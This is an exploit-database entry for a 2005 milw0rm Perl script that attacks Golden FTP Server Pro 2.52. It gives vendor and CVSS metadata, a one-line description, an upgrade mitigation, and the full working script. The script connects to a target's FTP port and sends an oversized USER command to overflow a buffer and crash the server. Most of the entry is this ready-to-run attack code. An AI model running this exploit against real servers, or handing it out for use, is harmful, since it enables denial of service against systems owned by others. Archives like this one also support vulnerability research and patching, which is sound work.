GoldenFTPServer_Overflow.pl

vendor:

Golden FTP Server Pro

by:

milw0rm.com

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Golden FTP Server Pro

Affected Version From: 2.52

Affected Version To: 2.52

Patch Exists: YES

Related CWE: N/A

CPE: //a:goldenftpserver:golden_ftp_server_pro:2.52

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

GoldenFTPServer_Overflow.pl

This exploit is for KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005). It sends a malicious USER command with a large number of 'A' characters followed by 'BBBB' to the FTP server, which causes a buffer overflow and crashes the server.

Mitigation:

Upgrade to the latest version of the Golden FTP Server Pro

Source

Exploit-DB raw data:

#===== Start GoldenFTPServer_Overflow.pl =====
#
# Usage: GoldenFTPServer_Overflow.pl <ip>
#        GoldenFTPServer_Overflow.pl 127.0.0.1
#
# KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005)
#
# Download:
# http://www.goldenftpserver.com/
#
###########################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "21",
                                    Proto    => "TCP"))
{
        print "Attempting to kill Golden FTP Server at $ARGV[0]:21...";

        sleep(1);

        print $socket "USER " . "A" x 332 . "BBBB\r\n";

        sleep(1);

        print $socket "PASS " . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:21\n";
}
#===== End GoldenFTPServer_Overflow.pl =====

# milw0rm.com [2005-04-27]